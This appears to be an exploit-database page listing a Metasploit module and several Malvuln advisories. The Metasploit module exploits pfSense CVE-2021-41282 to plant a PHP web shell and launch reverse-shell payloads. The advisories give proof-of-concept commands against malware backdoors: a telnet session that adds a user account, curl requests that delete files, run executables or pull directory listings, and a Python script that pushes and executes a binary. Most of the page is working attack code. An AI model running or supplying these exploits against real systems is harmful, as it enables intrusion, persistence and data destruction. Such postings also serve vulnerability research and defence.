Latest exploits :: CodePwn

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/2862de561d91eedb265df4ae9b0fc872.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.RemoteNC.beta4 Vulnerability: Unauthenticated Remote Command Execution Description: The malware listens on TCP port 49941. Third-party attackers who can reach an infected host can execute any OS commands hijacking taking over the system. Family: RemoteNC Type: PE32 MD5: 2862de561d91eedb265df4ae9b0fc872 Vuln ID: MVID-2022-0507 Disclosure: 03/03/2022 Exploit/PoC: c:\>telnet.exe x.x.x.x 49941 ===============Meteor Soft Labs. 1995-2001 All Rights Reserved.=============== =========Written by AssHoles, Server Edition ilovecandy@21cn.com============== Microsoft Windows [Version 10.0.16299.309] Slackbot:wwhhooaammii desktop-2c3iqho\victim Slackbot:ccaallcc Slackbot:nneett uusseerr hhyypp33rrlliinnxx 666666 //aadddd The command completed successfully. Slackbot:nneett uusseerr User accounts for \\DESKTOP-2C3IQHO ------------------------------------------------------------------------------- Administrator DefaultAccount Guest hyp3rlinx Victim WDAGUtilityAccount The command completed successfully. Slackbot: Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'pfSense Diag Routes Web Shell Upload', 'Description' => %q{ This module exploits an arbitrary file creation vulnerability in the pfSense HTTP interface (CVE-2021-41282). The vulnerability affects versions <= 2.5.2 and can be exploited by an authenticated user if they have the "WebCfg - Diagnostics: Routing tables" privilege. This module uses the vulnerability to create a web shell and execute payloads with root privileges. }, 'License' => MSF_LICENSE, 'Author' => [ 'Abdel Adim "smaury" Oisfi of Shielder', # vulnerability discovery 'jbaines-r7' # metasploit module ], 'References' => [ ['CVE', '2021-41282'], ['URL', 'https://www.shielder.it/advisories/pfsense-remote-command-execution/'] ], 'DisclosureDate' => '2022-02-23', 'Platform' => ['unix', 'bsd'], 'Arch' => [ARCH_CMD, ARCH_X64], 'Privileged' => true, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' }, 'Payload' => { 'Append' => ' & disown' } } ], [ 'BSD Dropper', { 'Platform' => 'bsd', 'Arch' => [ARCH_X64], 'Type' => :bsd_dropper, 'CmdStagerFlavor' => [ 'curl' ], 'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' } } ] ], 'DefaultTarget' => 1, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense']), OptString.new('WEBSHELL_NAME', [false, 'The name of the uploaded webshell. This value is random if left unset', nil]), OptBool.new('DELETE_WEBSHELL', [true, 'Indicates if the webshell should be deleted or not.', true]) ] @webshell_uri = '/' @webshell_path = '/usr/local/www/' end # Authenticate and attempt to exploit the diag_routes.php upload. Unfortunately, # pfsense permissions can be so locked down that we have to try direct exploitation # in order to determine vulnerability. A user can even be restricted from the # dashboard (where other pfsense modules extract the version). def check # Grab a CSRF token so that we can log in res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/index.php')) return CheckCode::Unknown("Didn't receive a response from the target.") unless res return CheckCode::Unknown("Unexpected HTTP response from index.php: #{res.code}") unless res.code == 200 return CheckCode::Unknown('Could not find pfSense title html tag') unless res.body.include?('<title>pfSense - Login') /var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body return CheckCode::Unknown('Could not find CSRF token') unless csrf # send the log in attempt res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, '/index.php'), 'method' => 'POST', 'vars_post' => { '__csrf_magic' => csrf, 'usernamefld' => datastore['USERNAME'], 'passwordfld' => datastore['PASSWORD'], 'login' => '' } ) return CheckCode::Detected('No response to log in attempt.') unless res return CheckCode::Detected('Log in failed. User provided invalid credentials.') unless res.code == 302 # save the auth cookie for later user @auth_cookies = res.get_cookies # attempt the exploit. Upload a random file to /usr/local/www/ with random contents filename = Rex::Text.rand_text_alpha(4..12) contents = Rex::Text.rand_text_alpha(16..32) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/diag_routes.php'), 'cookie' => @auth_cookies, 'encode_params' => false, 'vars_get' => { 'isAjax' => '1', 'filter' => ".*/!d;};s/Destination/#{contents}/;w+#{@webshell_path}#{filename}%0a%23" } }) return CheckCode::Safe('No response to upload attempt.') unless res return CheckCode::Safe("Exploit attempt did not receive 200 OK: #{res.code}") unless res.code == 200 # Validate the exploit was successful by requesting the uploaded file res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "/#{filename}"), 'cookie' => @auth_cookies }) return CheckCode::Safe('No response to exploit validation check.') unless res return CheckCode::Safe("Exploit validation check did not receive 200 OK: #{res.code}") unless res.code == 200 register_file_for_cleanup("#{@webshell_path}#{filename}") CheckCode::Vulnerable() end # Using the path traversal, upload a php webshell to the remote target def drop_webshell webshell_location = normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}") print_status("Uploading webshell to #{webshell_location}") # php_webshell = '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>' php_shell = '\\x3c\\x3fphp+if($_GET[\\x22cmd\\x22])+\\x7b+system($_GET[\\x22cmd\\x22])\\x3b+\\x7d+\\x3f\\x3e' res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/diag_routes.php'), 'cookie' => @auth_cookies, 'encode_params' => false, 'vars_get' => { 'isAjax' => '1', 'filter' => ".*/!d;};s/Destination/#{php_shell}/;w+#{@webshell_path}#{@webshell_name}%0a%23" } }) fail_with(Failure::Disconnected, 'Connection failed') unless res fail_with(Failure::UnexpectedReply, "Unexpected HTTP status code #{res.code}") unless res.code == 200 # Test the web shell installed by echoing a random string and ensure it appears in the res.body print_status('Testing if web shell installation was successful') rand_data = Rex::Text.rand_text_alphanumeric(16..32) res = execute_via_webshell("echo #{rand_data}") fail_with(Failure::UnexpectedReply, 'Web shell execution did not appear to succeed.') unless res.body.include?(rand_data) print_good("Web shell installed at #{webshell_location}") # This is a great place to leave a web shell for persistence since it doesn't require auth # to touch it. By default, we'll clean this up but the attacker has to option to leave it if datastore['DELETE_WEBSHELL'] register_file_for_cleanup("#{@webshell_path}#{@webshell_name}") end end # Executes commands via the uploaded webshell def execute_via_webshell(cmd) if target['Type'] == :bsd_dropper # the bsd dropper using the reverse shell payload + curl cmdstager doesn't have a good # way to force the payload to background itself (and thus allow the HTTP response to # to return). So we hack it in ourselves. This identifies the ending file cleanup # which should be right after executing the payload. cmd = cmd.sub(';rm -f /tmp/', ' & disown;rm -f /tmp/') end res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}"), 'vars_get' => { 'cmd' => cmd } }) fail_with(Failure::Disconnected, 'Connection failed') unless res fail_with(Failure::UnexpectedReply, "Unexpected HTTP status code #{res.code}") unless res.code == 200 res end def execute_command(cmd, _opts = {}) execute_via_webshell(cmd) end def exploit # create a randomish web shell name if the user doesn't specify one @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(5..12)}.php" drop_webshell print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :bsd_dropper execute_cmdstager end end end </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/30903ccbc6747c0da5a2775884b78def_C.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.BluanWeb Vulnerability: Unauthenticated Remote Command Execution Description: The malware "BlueAngel For WebServer" by "leonshoh" listens on TCP port 80. The malware provides an HTML web-interface that exposes the entire system and creates HTML page with links to delete, logoff or exit the system. Third-party attackers who can reach an infected host can make HTTP GET request to execute commands made available by the backdoor. [固定磁盘C] 卷标名： 文件名长度 255 文件系统 NTFS 磁盘大小 3625.000000 MB 剩余空间 3284.000000 MB [光盘D] [Fixed Disk C] Volume label name Filename length 255 File system NTFS Disk size 3625.000000 MB Free space 3284.000000 MB [Disc D] Family:BluanWeb Type: PE32 MD5: 30903ccbc6747c0da5a2775884b78def Vuln ID: MVID-2022-0506 Disclosure: 03/03/2022 Exploit/PoC: 1) delete any file http://x.x.x.x/unlink_C:/Boot/BCD.LOG 2) DOS backdoor curl http://x.x.x.x/exit 3) sign out the victim machine curl http://x.x.x.x/logoff Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/30903ccbc6747c0da5a2775884b78def.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.BluanWeb Vulnerability: Unauthenticated Remote Code Execution Description: The malware "BlueAngel For WebServer" by "leonshoh" listens on TCP port 80. The malware provides an HTML web-interface that exposes the entire system and creates HTML links to delete or run programs. E.g. [$Recycle.Bin] [Boot] bootmgr [删除] [运行] BOOTNXT [删除] [运行] BOOTSECT.BAK [删除] [运行] [Documents and Settings] [dump] pagefile.sys [删除] [运行] [PerfLogs] [Program Files] [Program Files (x86)] [ProgramData] [Recovery] swapfile.sys [删除] [运行] [System Volume Information] [Users] [Windows] Translated from Chinese: bootmgr [delete] [run] BOOTNXT [delete] [run] BOOTSECT.BAK [delete] [run] [Documents and Settings] [dump] pagefile.sys [delete] [run] [PerfLogs] [Program Files] [Program Files (x86)] [ProgramData] [Recovery] swapfile.sys [delete] [run] The HREF is like "run_EXECUTABLE". Third-party attackers who can reach infected hosts can make HTTP GET request appending any executable name. Family:BluanWeb Type: PE32 MD5: 30903ccbc6747c0da5a2775884b78def Vuln ID: MVID-2022-0504 Disclosure: 03/03/2022 Exploit/PoC: curl http://x.x.x.x/run_3rd_party_malware Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/30903ccbc6747c0da5a2775884b78def_B.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.BluanWeb Vulnerability: Information Disclosure Description: The malware "BlueAngel For WebServer" by "leonshoh" listens on TCP port 80. The malware provides an HTML web-interface that exposes the entire system and creates HTML links to delete or run programs listed in its directories. Third-party attackers who can reach an infected host can make HTTP GET request downloading any files on the system. [固定磁盘C] 卷标名： 文件名长度 255 文件系统 NTFS 磁盘大小 3625.000000 MB 剩余空间 3284.000000 MB [光盘D] [Fixed Disk C] Volume label name Filename length 255 File system NTFS Disk size 3625.000000 MB Free space 3284.000000 MB [Disc D] Family:BluanWeb Type: PE32 MD5: 30903ccbc6747c0da5a2775884b78def Vuln ID: MVID-2022-0505 Disclosure: 03/03/2022 Exploit/PoC: curl http://x.x.x.x/fold_C:/Windows/ --output infected_host_info.txt % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 15477 0 15477 0 0 15477 0 --:--:-- --:--:-- --:--:-- 243k Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/bf1b1a2f4be78d6b62ed7c316c77a9a1.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Augudor.a Vulnerability: Unauthenticated Remote File Write - RCE Description: Augudor.a drops an empty file named "zy.exe" and listens on TCP port 1011. Attackers who can reach the infected host can write any binary file they like to the empty "zy.exe" file on the system and it will execute as soon as the binary transfer has completed. Family: Augudor Type: PE32 MD5: bf1b1a2f4be78d6b62ed7c316c77a9a1 Vuln ID: MVID-2022-0501 Dropped files: zy.exe Disclosure: 03/03/2022 Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=1011 DOOM="DOOM.exe" def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) f = open(DOOM, "rb") EXE = f.read() s.send(EXE) while EXE: s.send(EXE) EXE=f.read() s.close() print("Backdoor.Win32.Augudor.a / Unauthenticated Remote File Write Code Execution") print("MD5: bf1b1a2f4be78d6b62ed7c316c77a9a1") print("By Malvuln"); if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>